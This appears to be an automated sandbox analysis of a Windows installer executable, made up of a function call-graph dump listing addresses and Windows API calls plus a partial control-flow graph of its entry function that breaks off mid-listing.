4709->4640 4710->4633 4711->4638 4712->4708 4714 100012b4 4713->4714 4715 10001224 2 API calls 4714->4715 4716 100012cf 4715->4716 4716->4645 4718 10002581 4717->4718 4719 1000252b VirtualAlloc 4717->4719 4718->4651 4719->4718 4720->4675 4722 100012f9 4721->4722 4723 100012da 4721->4723 4722->4675 4723->4722 4724 100012e0 lstrcpyA 4723->4724 4724->4722 4725->4686 5093 401000 5094 401037 BeginPaint GetClientRect 5093->5094 5095 40100c DefWindowProcA 5093->5095 5097 4010f3 5094->5097 5098 401179 5095->5098 5099 401073 CreateBrushIndirect FillRect DeleteObject 5097->5099 5100 4010fc 5097->5100 5099->5097 5101 401102 CreateFontIndirectA 5100->5101 5102 401167 EndPaint 5100->5102 5101->5102 5103 401112 6 API calls 5101->5103 5102->5098 5103->5102 5104 401900 5105 402ace 18 API calls 5104->5105 5106 401907 5105->5106 5107 4055b9 MessageBoxIndirectA 5106->5107 5108 401910 5107->5108 5109 403701 5110 40370c 5109->5110 5111 403710 5110->5111 5112 403713 GlobalAlloc 5110->5112 5112->5111 5113 401502 5114 40150a 5113->5114 5116 40151d 5113->5116 5115 402aac 18 API calls 5114->5115 5115->5116 3648 402483 3659 402bd8 3648->3659 3650 40248d 3663 402ace 3650->3663 3653 4024a0 RegQueryValueExA 3655 4024c0 3653->3655 3656 4024c6 RegCloseKey 3653->3656 3654 402729 3655->3656 3669 405d21 wsprintfA 3655->3669 3656->3654 3660 402ace 18 API calls 3659->3660 3661 402bf1 3660->3661 3662 402bff RegOpenKeyExA 3661->3662 3662->3650 3664 402ada 3663->3664 3670 405de5 3664->3670 3667 402496 3667->3653 3667->3654 3669->3656 3675 405df2 3670->3675 3671 406015 3672 402afb 3671->3672 3704 405dc3 lstrcpynA 3671->3704 3672->3667 3688 40602e 3672->3688 3674 405e93 GetVersion 3674->3675 3675->3671 3675->3674 3676 405fec lstrlenA 3675->3676 3679 405de5 10 API calls 3675->3679 3680 405f0b GetSystemDirectoryA 3675->3680 3682 405f1e GetWindowsDirectoryA 3675->3682 3683 40602e 5 API calls 3675->3683 3684 405f52 SHGetSpecialFolderLocation 3675->3684 3685 405de5 10 API calls 3675->3685 3686 405f95 lstrcatA 3675->3686 3697 405caa RegOpenKeyExA 3675->3697 3702 405d21 wsprintfA 3675->3702 3703 405dc3 lstrcpynA 3675->3703 3676->3675 3679->3676 3680->3675 3682->3675 3683->3675 3684->3675 3687 405f6a SHGetPathFromIDListA CoTaskMemFree 3684->3687 3685->3675 3686->3675 3687->3675 3689 40603a 3688->3689 3691 406097 CharNextA 3689->3691 3693 4060a2 3689->3693 3695 406085 CharNextA 3689->3695 3696 406092 CharNextA 3689->3696 3705 405860 3689->3705 3690 4060a6 CharPrevA 3690->3693 3691->3689 3691->3693 3693->3690 3694 4060c1 3693->3694 3694->3667 3695->3689 3696->3691 3698 405d1b 3697->3698 3699 405cdd RegQueryValueExA 3697->3699 3698->3675 3700 405cfe RegCloseKey 3699->3700 3700->3698 3702->3675 3703->3675 3704->3672 3706 405866 3705->3706 3707 405879 3706->3707 3708 40586c CharNextA 3706->3708 3707->3689 3708->3706 5117 100029c3 5118 100029db 5117->5118 5119 10001534 2 API calls 5118->5119 5120 100029f6 5119->5120 5121 401c04 5122 402aac 18 API calls 5121->5122 5123 401c0b 5122->5123 5124 402aac 18 API calls 5123->5124 5125 401c18 5124->5125 5126 402ace 18 API calls 5125->5126 5128 401c2d 5125->5128 5126->5128 5127 401c3d 5130 401c94 5127->5130 5131 401c48 5127->5131 5128->5127 5129 402ace 18 API calls 5128->5129 5129->5127 5132 402ace 18 API calls 5130->5132 5133 402aac 18 API calls 5131->5133 5134 401c99 5132->5134 5135 401c4d 5133->5135 5136 402ace 18 API calls 5134->5136 5137 402aac 18 API calls 5135->5137 5139 401ca2 FindWindowExA 5136->5139 5138 401c59 5137->5138 5140 401c84 SendMessageA 5138->5140 5141 401c66 SendMessageTimeoutA 5138->5141 5142 401cc0 5139->5142 5140->5142 5141->5142 4188 40270b 4189 402ace 18 API calls 4188->4189 4190 402712 FindFirstFileA 4189->4190 4191 402735 4190->4191 4192 402725 4190->4192 4193 40273c 4191->4193 4196 405d21 wsprintfA 4191->4196 4197 405dc3 lstrcpynA 4193->4197 4196->4193 4197->4192 5143 401490 5144 404fdc 25 API calls 5143->5144 5145 401497 5144->5145 5146 402590 5147 402595 5146->5147 5148 4025a9 5146->5148 5149 402aac 18 API calls 5147->5149 5150 402ace 18 API calls 5148->5150 5152 40259e 5149->5152 5151 4025b0 lstrlenA 5150->5151 5151->5152 5153 405add WriteFile 5152->5153 5154 4025d2 5152->5154 5153->5154 5155 402c13 5156 402c22 SetTimer 5155->5156 5157 402c3b 5155->5157 5156->5157 5158 402c90 5157->5158 5159 402c55 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5157->5159 5159->5158 4366 402695 4367 40269c 4366->4367 4369 40290b 4366->4369 4368 402aac 18 API calls 4367->4368 4370 4026a3 4368->4370 4371 4026b2 SetFilePointer 4370->4371 4371->4369 4372 4026c2 4371->4372 4374 405d21 wsprintfA 4372->4374 4374->4369 5160 401d95 GetDC 5161 402aac 18 API calls 5160->5161 5162 401da7 GetDeviceCaps MulDiv ReleaseDC 5161->5162 5163 402aac 18 API calls 5162->5163 5164 401dd8 5163->5164 5165 405de5 18 API calls 5164->5165 5166 401e15 CreateFontIndirectA 5165->5166 5167 40258a 5166->5167 5168 10001058 5170 10001074 5168->5170 5169 100010dc 5170->5169 5171 100014bb GlobalFree 5170->5171 5172 10001091 5170->5172 5171->5172 5173 100014bb GlobalFree 5172->5173 5174 100010a1 5173->5174 5175 100010b1 5174->5175 5176 100010a8 GlobalSize 5174->5176 5177 100010b5 GlobalAlloc 5175->5177 5179 100010c6 5175->5179 5176->5175 5178 100014e2 3 API calls 5177->5178 5178->5179 5180 100010d1 GlobalFree 5179->5180 5180->5169 5181 40511a 5182 4052c5 5181->5182 5183 40513c GetDlgItem GetDlgItem GetDlgItem 5181->5183 5185 4052f5 5182->5185 5186 4052cd GetDlgItem CreateThread CloseHandle 5182->5186 5226 403fdd SendMessageA 5183->5226 5187 405323 5185->5187 5188 405344 5185->5188 5189 40530b ShowWindow ShowWindow 5185->5189 5186->5185 5191 40537e 5187->5191 5193 405333 5187->5193 5194 405357 ShowWindow 5187->5194 5195 40400f 8 API calls 5188->5195 5228 403fdd SendMessageA 5189->5228 5190 4051ac 5196 4051b3 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5190->5196 5191->5188 5199 40538b SendMessageA 5191->5199 5200 403f81 SendMessageA 5193->5200 5202 405377 5194->5202 5203 405369 5194->5203 5201 405350 5195->5201 5197 405221 5196->5197 5198 405205 SendMessageA SendMessageA 5196->5198 5204 405234 5197->5204 5205 405226 SendMessageA 5197->5205 5198->5197 5199->5201 5206 4053a4 CreatePopupMenu 5199->5206 5200->5188 5208 403f81 SendMessageA 5202->5208 5207 404fdc 25 API calls 5203->5207 5210 403fa8 19 API calls 5204->5210 5205->5204 5209 405de5 18 API calls 5206->5209 5207->5202 5208->5191 5211 4053b4 AppendMenuA 5209->5211 5212 405244 5210->5212 5213 4053d2 GetWindowRect 5211->5213 5214 4053e5 TrackPopupMenu 5211->5214 5215 405281 GetDlgItem SendMessageA 5212->5215 5216 40524d ShowWindow 5212->5216 5213->5214 5214->5201 5217 405401 5214->5217 5215->5201 5219 4052a8 SendMessageA SendMessageA 5215->5219 5218 405263 ShowWindow 5216->5218 5221 405270 5216->5221 5220 405420 SendMessageA 5217->5220 5218->5221 5219->5201 5220->5220 5222 40543d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5220->5222 5227 403fdd SendMessageA 5221->5227 5224 40545f SendMessageA 5222->5224 5224->5224 5225 405481 GlobalUnlock SetClipboardData CloseClipboard 5224->5225 5225->5201 5226->5190 5227->5215 5228->5187 5229 401d1a 5230 402aac 18 API calls 5229->5230 5231 401d28 SetWindowLongA 5230->5231 5232 40295e 5231->5232 4538 40159d 4539 402ace 18 API calls 4538->4539 4540 4015a4 SetFileAttributesA 4539->4540 4541 4015b6 4540->4541 5238 40149d 5239 4014ab PostQuitMessage 5238->5239 5240 4022dd 5238->5240 5239->5240 4542 401a1e 4543 402ace 18 API calls 4542->4543 4544 401a27 ExpandEnvironmentStringsA 4543->4544 4545 401a3b 4544->4545 4546 401a4e 4544->4546 4545->4546 4547 401a40 lstrcmpA 4545->4547 4547->4546 4726 40171f 4727 402ace 18 API calls 4726->4727 4728 401726 SearchPathA 4727->4728 4729 401741 4728->4729 5241 40439f 5242 4043d5 5241->5242 5243 4043af 5241->5243 5245 40400f 8 API calls 5242->5245 5244 403fa8 19 API calls 5243->5244 5246 4043bc SetDlgItemTextA 5244->5246 5247 4043e1 5245->5247 5246->5242 5248 100010e0 5257 1000110e 5248->5257 5249 100011c4 GlobalFree 5250 100012ad 2 API calls 5250->5257 5251 100011c3 5251->5249 5252 100011ea GlobalFree 5252->5257 5253 10001266 2 API calls 5256 100011b1 GlobalFree 5253->5256 5254 10001155 GlobalAlloc 5254->5257 5255 100012d1 lstrcpyA 5255->5257 5256->5257 5257->5249 5257->5250 5257->5251 5257->5252 5257->5253 5257->5254 5257->5255 5257->5256 5258 10002162 5259 100021c0 5258->5259 5261 100021f6 5258->5261 5260 100021d2 GlobalAlloc 5259->5260 5259->5261 5260->5259 3709 4031a3 SetErrorMode GetVersion 3710 4031da 3709->3710 3711 4031e0 3709->3711 3712 40615c 5 API calls 3710->3712 3797 4060ee GetSystemDirectoryA 3711->3797 3712->3711 3714 4031f6 lstrlenA 3714->3711 3715 403205 3714->3715 3800 40615c GetModuleHandleA 3715->3800 3718 40615c 5 API calls 3719 403214 #17 OleInitialize SHGetFileInfoA 3718->3719 3806 405dc3 lstrcpynA 3719->3806 3721 403251 GetCommandLineA 3807 405dc3 lstrcpynA 3721->3807 3723 403263 GetModuleHandleA 3724 40327a 3723->3724 3725 405860 CharNextA 3724->3725 3726 40328e CharNextA 3725->3726 3734 40329e 3726->3734 3727 403368 3728 40337b GetTempPathA 3727->3728 3808 403172 3728->3808 3730 403393 3731 403397 GetWindowsDirectoryA lstrcatA 3730->3731 3732 4033ed DeleteFileA 3730->3732 3735 403172 12 API calls 3731->3735 3818 402cfa GetTickCount GetModuleFileNameA 3732->3818 3733 405860 CharNextA 3733->3734 3734->3727 3734->3733 3739 40336a 3734->3739 3738 4033b3 3735->3738 3737 403401 3742 403487 3737->3742 3746 405860 CharNextA 3737->3746 3793 403497 3737->3793 3738->3732 3741 4033b7 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3738->3741 3913 405dc3 lstrcpynA 3739->3913 3744 403172 12 API calls 3741->3744 3846 403743 3742->3846 3748 4033e5 3744->3748 3749 40341c 3746->3749 3748->3732 3748->3793 3756 403462 3749->3756 3757 4034c7 3749->3757 3750 4034b1 3937 4055b9 3750->3937 3751 4035cf 3753 403651 ExitProcess 3751->3753 3754 4035d7 GetCurrentProcess OpenProcessToken 3751->3754 3759 403622 3754->3759 3760 4035f2 LookupPrivilegeValueA AdjustTokenPrivileges 3754->3760 3914 405923 3756->3914 3902 40553c 3757->3902 3763 40615c 5 API calls 3759->3763 3760->3759 3764 403629 3763->3764 3767 40363e ExitWindowsEx 3764->3767 3770 40364a 3764->3770 3767->3753 3767->3770 3768 4034e8 lstrcatA lstrcmpiA 3772 403504 3768->3772 3768->3793 3769 4034dd lstrcatA 3769->3768 3950 40140b 3770->3950 3773 403510 3772->3773 3774 403509 3772->3774 3946 40551f CreateDirectoryA 3773->3946 3941 4054a2 CreateDirectoryA 3774->3941 3776 40347c 3929 405dc3 lstrcpynA 3776->3929 3781 403515 SetCurrentDirectoryA 3782 403524 3781->3782 3783 40352f 3781->3783 3949 405dc3 lstrcpynA 3782->3949 3905 405dc3 lstrcpynA 3783->3905 3786 40353d 3787 405de5 18 API calls 3786->3787 3790 4035c3 3786->3790 3794 405de5 18 API calls 3786->3794 3796 4035af CloseHandle 3786->3796 3906 405c7e MoveFileExA 3786->3906 3910 405554 CreateProcessA 3786->3910 3788 40356e DeleteFileA 3787->3788 3788->3786 3789 40357b CopyFileA 3788->3789 3789->3786 3792 405c7e 38 API calls 3790->3792 3792->3793 3930 403669 3793->3930 3794->3786 3796->3786 3798 406110 wsprintfA LoadLibraryExA 3797->3798 3798->3714 3801 406182 GetProcAddress 3800->3801 3802 406178 3800->3802 3803 40320d 3801->3803 3804 4060ee 3 API calls 3802->3804 3803->3718 3805 40617e 3804->3805 3805->3801 3805->3803 3806->3721 3807->3723 3809 40602e 5 API calls 3808->3809 3810 40317e 3809->3810 3811 403188 3810->3811 3953 405835 lstrlenA CharPrevA 3810->3953 3811->3730 3814 40551f 2 API calls 3815 403196 3814->3815 3956 405a65 3815->3956 3960 405a36 GetFileAttributesA CreateFileA 3818->3960 3820 402d3a 3839 402d4a 3820->3839 3961 405dc3 lstrcpynA 3820->3961 3822 402d60 3962 40587c lstrlenA 3822->3962 3826 402d71 GetFileSize 3827 402e6d 3826->3827 3841 402d88 3826->3841 3967 402c96 3827->3967 3829 402e76 3831 402ea6 GlobalAlloc 3829->3831 3829->3839 4002 40315b SetFilePointer 3829->4002 3978 40315b SetFilePointer 3831->3978 3834 402ed9 3836 402c96 6 API calls 3834->3836 3835 402ec1 3979 402f33 3835->3979 3836->3839 3837 402e8f 3840 403145 ReadFile 3837->3840 3839->3737 3843 402e9a 3840->3843 3841->3827 3841->3834 3841->3839 3842 402c96 6 API calls 3841->3842 3999 403145 3841->3999 3842->3841 3843->3831 3843->3839 3844 402ecd 3844->3839 3844->3844 3845 402f0a SetFilePointer 3844->3845 3845->3839 3847 40615c 5 API calls 3846->3847 3848 403757 3847->3848 3849 40375d 3848->3849 3850 40376f 3848->3850 4032 405d21 wsprintfA 3849->4032 3851 405caa 3 API calls 3850->3851 3852 40379a 3851->3852 3854 4037b8 lstrcatA 3852->3854 3856 405caa 3 API calls 3852->3856 3855 40376d 3854->3855 4023 403a08 3855->4023 3856->3854 3859 405923 18 API calls 3860 4037ea 3859->3860 3861 403873 3860->3861 3864 405caa 3 API calls 3860->3864 3862 405923 18 API calls 3861->3862 3863 403879 3862->3863 3866 403889 LoadImageA 3863->3866 3867 405de5 18 API calls 3863->3867 3865 403816 3864->3865 3865->3861 3870 403832 lstrlenA 3865->3870 3874 405860 CharNextA 3865->3874 3868 4038b0 RegisterClassA 3866->3868 3869 40392f 3866->3869 3867->3866 3871 4038e6 SystemParametersInfoA CreateWindowExA 3868->3871 3872 403939 3868->3872 3873 40140b 2 API calls 3869->3873 3875 403840 lstrcmpiA 3870->3875 3876 403866 3870->3876 3871->3869 3872->3793 3877 403935 3873->3877 3878 403830 3874->3878 3875->3876 3879 403850 GetFileAttributesA 3875->3879 3880 405835 3 API calls 3876->3880 3877->3872 3882 403a08 19 API calls 3877->3882 3878->3870 3881 40385c 3879->3881 3883 40386c 3880->3883 3881->3876 3884 40587c 2 API calls 3881->3884 3885 403946 3882->3885 4033 405dc3 lstrcpynA 3883->4033 3884->3876 3887 403952 ShowWindow 3885->3887 3888 4039d5 3885->3888 3890 4060ee 3 API calls 3887->3890 4034 4050ae OleInitialize 3888->4034 3893 40396a 3890->3893 3891 4039db 3894 4039f7 3891->3894 3895 4039df 3891->3895 3892 403978 GetClassInfoA 3898 4039a2 DialogBoxParamA 3892->3898 3899 40398c GetClassInfoA RegisterClassA 3892->3899 3893->3892 3896 4060ee 3 API calls 3893->3896 3897 40140b 2 API calls 3894->3897 3895->3872 3901 40140b 2 API calls 3895->3901 3896->3892 3897->3872 3900 40140b 2 API calls 3898->3900 3899->3898 3900->3872 3901->3872 3903 40615c 5 API calls 3902->3903 3904 4034cc lstrcatA 3903->3904 3904->3768 3904->3769 3905->3786 3907 405c9f 3906->3907 3908 405c92 3906->3908 3907->3786 4049 405b0c lstrcpyA 3908->4049 3911 405593 3910->3911 3912 405587 CloseHandle 3910->3912 3911->3786 3912->3911 3913->3728 4083 405dc3 lstrcpynA 3914->4083 3916 405934 4084 4058ce CharNextA CharNextA 3916->4084 3919 40346d 3919->3793 3928 405dc3 lstrcpynA 3919->3928 3920 40602e 5 API calls 3926 40594a 3920->3926 3921 405975 lstrlenA 3922 405980 3921->3922 3921->3926 3924 405835 3 API calls 3922->3924 3925 405985 GetFileAttributesA 3924->3925 3925->3919 3926->3919 3926->3921 3927 40587c 2 API calls 3926->3927 4090 4060c7 FindFirstFileA 3926->4090 3927->3921 3928->3776 3929->3742 3931 403681 3930->3931 3932 403673 CloseHandle 3930->3932 4093 4036ae 3931->4093 3932->3931 3938 4055ce 3937->3938 3939 4034bf ExitProcess 3938->3939 3940 4055e2 MessageBoxIndirectA 3938->3940 3940->3939 3942 4054f3 GetLastError 3941->3942 3943 40350e 3941->3943 3942->3943 3944 405502 SetFileSecurityA 3942->3944 3943->3781 3944->3943 3945 405518 GetLastError 3944->3945 3945->3943 3947 405533 GetLastError 3946->3947 3948 40552f 3946->3948 3947->3948 3948->3781 3949->3783 3951 401389 2 API calls 3950->3951 3952 401420 3951->3952 3952->3753 3954 403190 3953->3954 3955 40584f lstrcatA 3953->3955 3954->3814 3955->3954 3957 405a70 GetTickCount GetTempFileNameA 3956->3957 3958 4031a1 3957->3958 3959 405a9d 3957->3959 3958->3730 3959->3957 3959->3958 3960->3820 3961->3822 3963 405889 3962->3963 3964 402d66 3963->3964 3965 40588e CharPrevA 3963->3965 3966 405dc3 lstrcpynA 3964->3966 3965->3963 3965->3964 3966->3826 3968 402cb7 3967->3968 3969 402c9f 3967->3969 3972 402cc7 GetTickCount 3968->3972 3973 402cbf 3968->3973 3970 402ca8 DestroyWindow 3969->3970 3971 402caf 3969->3971 3970->3971 3971->3829 3975 402cd5 CreateDialogParamA ShowWindow 3972->3975 3976 402cf8 3972->3976 4003 406198 3973->4003 3975->3976 3976->3829 3978->3835 3980 402f49 3979->3980 3981 402f77 3980->3981 4009 40315b SetFilePointer 3980->4009 3983 403145 ReadFile 3981->3983 3984 402f82 3983->3984 3985 402f94 GetTickCount 3984->3985 3986 4030de 3984->3986 3993 4030c8 3984->3993 3985->3993 3997 402fe3 3985->3997 3987 403120 3986->3987 3992 4030e2 3986->3992 3989 403145 ReadFile 3987->3989 3988 403145 ReadFile 3988->3997 3989->3993 3990 403145 ReadFile 3990->3992 3991 405add WriteFile 3991->3992 3992->3990 3992->3991 3992->3993 3993->3844 3994 403039 GetTickCount 3994->3997 3995 40305e MulDiv wsprintfA 4010 404fdc 3995->4010 3997->3988 3997->3993 3997->3994 3997->3995 4007 405add WriteFile 3997->4007 4021 405aae ReadFile 3999->4021 4002->3837 4004 4061b5 PeekMessageA 4003->4004 4005 402cc5 4004->4005 4006 4061ab DispatchMessageA 4004->4006 4005->3829 4006->4004 4008 405afb 4007->4008 4008->3997 4009->3981 4011 404ff7 4010->4011 4020 40509a 4010->4020 4012 405014 lstrlenA 4011->4012 4013 405de5 18 API calls 4011->4013 4014 405022 lstrlenA 4012->4014 4015 40503d 4012->4015 4013->4012 4016 405034 lstrcatA 4014->4016 4014->4020 4017 405050 4015->4017 4018 405043 SetWindowTextA 4015->4018 4016->4015 4019 405056 SendMessageA SendMessageA SendMessageA 4017->4019 4017->4020 4018->4017 4019->4020 4020->3997 4022 403158 4021->4022 4022->3841 4024 403a1c 4023->4024 4041 405d21 wsprintfA 4024->4041 4026 403a8d 4027 405de5 18 API calls 4026->4027 4028 403a99 SetWindowTextA 4027->4028 4029 4037c8 4028->4029 4030 403ab5 4028->4030 4029->3859 4030->4029 4031 405de5 18 API calls 4030->4031 4031->4030 4032->3855 4033->3861 4042 403ff4 4034->4042 4036 403ff4 SendMessageA 4037 40510a OleUninitialize 4036->4037 4037->3891 4038 4050f8 4038->4036 4040 4050d1 4040->4038 4045 401389 4040->4045 4041->4026 4043 40400c 4042->4043 4044 403ffd SendMessageA 4042->4044 4043->4040 4044->4043 4047 401390 4045->4047 4046 4013fe 4046->4040 4047->4046 4048 4013cb MulDiv SendMessageA 4047->4048 4048->4047 4050 405b34 4049->4050 4051 405b5a GetShortPathNameA 4049->4051 4076 405a36 GetFileAttributesA CreateFileA 4050->4076 4053 405c79 4051->4053 4054 405b6f 4051->4054 4053->3907 4054->4053 4056 405b77 wsprintfA 4054->4056 4055 405b3e CloseHandle GetShortPathNameA 4055->4053 4058 405b52 4055->4058 4057 405de5 18 API calls 4056->4057 4059 405b9f 4057->4059 4058->4051 4058->4053 4077 405a36 GetFileAttributesA CreateFileA 4059->4077 4061 405bac 4061->4053 4062 405bbb GetFileSize GlobalAlloc 4061->4062 4063 405c72 CloseHandle 4062->4063 4064 405bdd 4062->4064 4063->4053 4065 405aae ReadFile 4064->4065 4066 405be5 4065->4066 4066->4063 4078 40599b lstrlenA 4066->4078 4069 405c10 4071 40599b 4 API calls 4069->4071 4070 405bfc lstrcpyA 4072 405c1e 4070->4072 4071->4072 4073 405c55 SetFilePointer 4072->4073 4074 405add WriteFile 4073->4074 4075 405c6b GlobalFree 4074->4075 4075->4063 4076->4055 4077->4061 4079 4059dc lstrlenA 4078->4079 4080 4059e4 4079->4080 4081 4059b5 lstrcmpiA 4079->4081 4080->4069 4080->4070 4081->4080 4082 4059d3 CharNextA 4081->4082 4082->4079 4083->3916 4085 4058e9 4084->4085 4087 4058f9 4084->4087 4085->4087 4088 4058f4 CharNextA 4085->4088 4086 405919 4086->3919 4086->3920 4087->4086 4089 405860 CharNextA 4087->4089 4088->4086 4089->4087 4091 4060e8 4090->4091 4092 4060dd FindClose 4090->4092 4091->3926 4092->4091 4094 4036bc 4093->4094 4095 403686 4094->4095 4096 4036c1 FreeLibrary GlobalFree 4094->4096 4097 405665 4095->4097 4096->4095 4096->4096 4098 405923 18 API calls 4097->4098 4099 405685 4098->4099 4100 4056a4 4099->4100 4101 40568d DeleteFileA 4099->4101 4103 4057dc 4100->4103 4138 405dc3 lstrcpynA 4100->4138 4102 4034a0 OleUninitialize 4101->4102 4102->3750 4102->3751 4103->4102 4108 4060c7 2 API calls 4103->4108 4105 4056ca 4106 4056d0 lstrcatA 4105->4106 4107 4056dd 4105->4107 4109 4056e3 4106->4109 4110 40587c 2 API calls 4107->4110 4113 4057f6 4108->4113 4111 4056f1 lstrcatA 4109->4111 4112 4056e8 4109->4112 4110->4109 4114 4056fc lstrlenA FindFirstFileA 4111->4114 4112->4111 4112->4114 4113->4102 4115 4057fa 4113->4115 4116 4057d2 4114->4116 4120 405720 4114->4120 4117 405835 3 API calls 4115->4117 4116->4103 4119 405800 4117->4119 4118 405860 CharNextA 4118->4120 4121 40561d 5 API calls 4119->4121 4120->4118 4126 4057b1 FindNextFileA 4120->4126 4133 405665 62 API calls 4120->4133 4135 404fdc 25 API calls 4120->4135 4136 404fdc 25 API calls 4120->4136 4137 405c7e 38 API calls 4120->4137 4139 405dc3 lstrcpynA 4120->4139 4140 40561d 4120->4140 4122 40580c 4121->4122 4123 405810 4122->4123 4124 405826 4122->4124 4123->4102 4128 404fdc 25 API calls 4123->4128 4125 404fdc 25 API calls 4124->4125 4125->4102 4126->4120 4129 4057c9 FindClose 4126->4129 4130 40581d 4128->4130 4129->4116 4131 405c7e 38 API calls 4130->4131 4134 405824 4131->4134 4133->4120 4134->4102 4135->4126 4136->4120 4137->4120 4138->4105 4139->4120 4148 405a11 GetFileAttributesA 4140->4148 4143 40564a 4143->4120 4144 405640 DeleteFileA 4146 405646 4144->4146 4145 405638 RemoveDirectoryA 4145->4146 4146->4143 4147 405656 SetFileAttributesA 4146->4147 4147->4143 4149 405629 4148->4149 4150 405a23 SetFileAttributesA 4148->4150 4149->4143 4149->4144 4149->4145 4150->4149 4151 401e25 4159 402aac 4151->4159 4153 401e2b 4154 402aac 18 API calls 4153->4154 4155 401e37 4154->4155 4156 401e43 ShowWindow 4155->4156 4157 401e4e EnableWindow 4155->4157 4158 40295e 4156->4158 4157->4158 4160 405de5 18 API calls 4159->4160 4161 402ac1 4160->4161 4161->4153 5262 401f2d 5263 402ace 18 API calls 5262->5263 5264 401f34 5263->5264 5265 4060c7 2 API calls 5264->5265 5266 401f3a 5265->5266 5267 401f4c 5266->5267 5269 405d21 wsprintfA 5266->5269 5269->5267 5270 402336 5271 402ace 18 API calls 5270->5271 5272 402347 5271->5272 5273 402ace 18 API calls 5272->5273 5274 402350 5273->5274 5275 402ace 18 API calls 5274->5275 5276 40235a GetPrivateProfileStringA 5275->5276 5277 4014b7 5278 4014bd 5277->5278 5279 401389 2 API calls 5278->5279 5280 4014c5 5279->5280 5281 404737 5282 404763 5281->5282 5283 404747 5281->5283 5285 404796 5282->5285 5286 404769 SHGetPathFromIDListA 5282->5286 5292 40559d GetDlgItemTextA 5283->5292 5287 404779 5286->5287 5291 404780 SendMessageA 5286->5291 5289 40140b 2 API calls 5287->5289 5288 404754 SendMessageA 5288->5282 5289->5291 5291->5285 5292->5288 5293 401b39 5294 402ace 18 API calls 5293->5294 5295 401b40 5294->5295 5296 402aac 18 API calls 5295->5296 5297 401b49 wsprintfA 5296->5297 5298 40295e 5297->5298 5299 402939 SendMessageA 5300 402953 InvalidateRect 5299->5300 5301 40295e 5299->5301 5300->5301 4518 4015bb 4519 402ace 18 API calls 4518->4519 4520 4015c2 4519->4520 4521 4058ce 4 API calls 4520->4521 4533 4015ca 4521->4533 4522 401624 4524 401652 4522->4524 4525 401629 4522->4525 4523 405860 CharNextA 4523->4533 4527 401423 25 API calls 4524->4527 4526 401423 25 API calls 4525->4526 4528 401630 4526->4528 4535 40164a 4527->4535 4537 405dc3 lstrcpynA 4528->4537 4530 40551f 2 API calls 4530->4533 4531 40553c 5 API calls 4531->4533 4532 40163b SetCurrentDirectoryA 4532->4535 4533->4522 4533->4523 4533->4530 4533->4531 4534 40160c GetFileAttributesA 4533->4534 4536 4054a2 4 API calls 4533->4536 4534->4533 4536->4533 4537->4532 5302 4016bb 5303 402ace 18 API calls 5302->5303 5304 4016c1 GetFullPathNameA 5303->5304 5305 4016d8 5304->5305 5311 4016f9 5304->5311 5307 4060c7 2 API calls 5305->5307 5305->5311 5306 40170d GetShortPathNameA 5308 40295e 5306->5308 5309 4016e9 5307->5309 5309->5311 5312 405dc3 lstrcpynA 5309->5312 5311->5306 5311->5308 5312->5311 5313 401d3b GetDlgItem GetClientRect 5314 402ace 18 API calls 5313->5314 5315 401d6b LoadImageA SendMessageA 5314->5315 5316 401d89 DeleteObject 5315->5316 5317 40295e 5315->5317 5316->5317 5318 4040bc lstrcpynA lstrlenA

                                                                          Executed Functions

                                                                          Function 004031A3 Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357stringcomfileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 4031a3-4031d8 SetErrorMode GetVersion 1 4031da-4031e2 call 40615c 0->1 2 4031eb 0->2 1->2 8 4031e4 1->8 4 4031f0-403203 call 4060ee lstrlenA 2->4 9 403205-403278 call 40615c * 2 #17 OleInitialize SHGetFileInfoA call 405dc3 GetCommandLineA call 405dc3 GetModuleHandleA 4->9 8->2 18 403284-403299 call 405860 CharNextA 9->18 19 40327a-40327f 9->19 22 40335e-403362 18->22 19->18 23 403368 22->23 24 40329e-4032a1 22->24 27 40337b-403395 GetTempPathA call 403172 23->27 25 4032a3-4032a7 24->25 26 4032a9-4032b1 24->26 25->25 25->26 28 4032b3-4032b4 26->28 29 4032b9-4032bc 26->29 36 403397-4033b5 GetWindowsDirectoryA lstrcatA call 403172 27->36 37 4033ed-403407 DeleteFileA call 402cfa 27->37 28->29 31 4032c2-4032c6 29->31 32 40334e-40335b call 405860 29->32 34 4032c8-4032ce 31->34 35 4032de-40330b 31->35 32->22 47 40335d 32->47 39 4032d0-4032d2 34->39 40 4032d4 34->40 41 40330d-403313 35->41 42 40331e-40334c 35->42 36->37 55 4033b7-4033e7 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403172 36->55 52 40349b-4034ab call 403669 OleUninitialize 37->52 53 40340d-403413 37->53 39->35 39->40 40->35 48 403315-403317 41->48 49 403319 41->49 42->32 51 40336a-403376 call 405dc3 42->51 47->22 48->42 48->49 49->42 51->27 66 4034b1-4034c1 call 4055b9 ExitProcess 52->66 67 4035cf-4035d5 52->67 56 403415-403420 call 405860 53->56 57 40348b-403492 call 403743 53->57 55->37 55->52 68 403422-40344b 56->68 69 403456-403460 56->69 64 403497 57->64 64->52 71 403651-403659 67->71 72 4035d7-4035f0 GetCurrentProcess OpenProcessToken 67->72 73 40344d-40344f 68->73 76 403462-40346f call 405923 69->76 77 4034c7-4034db call 40553c lstrcatA 69->77 74 40365b 71->74 75 40365f-403663 ExitProcess 71->75 79 403622-403630 call 40615c 72->79 80 4035f2-40361c LookupPrivilegeValueA AdjustTokenPrivileges 72->80 73->69 81 403451-403454 73->81 74->75 76->52 90 403471-403487 call 405dc3 * 2 76->90 91 4034e8-403502 lstrcatA lstrcmpiA 77->91 92 4034dd-4034e3 lstrcatA 77->92 88 403632-40363c 79->88 89 40363e-403648 ExitWindowsEx 79->89 80->79 81->69 81->73 88->89 93 40364a-40364c call 40140b 88->93 89->71 89->93 90->57 91->52 95 403504-403507 91->95 92->91 93->71 96 403510 call 40551f 95->96 97 403509-40350e call 4054a2 95->97 106 403515-403522 SetCurrentDirectoryA 96->106 97->106 107 403524-40352a call 405dc3 106->107 108 40352f-403557 call 405dc3 106->108 107->108 112 40355d-403579 call 405de5 DeleteFileA 108->112 115 4035ba-4035c1 112->115 116 40357b-40358b CopyFileA 112->116 115->112 117 4035c3-4035ca call 405c7e 115->117 116->115 118 40358d-4035a6 call 405c7e call 405de5 call 405554 116->118 117->52 126 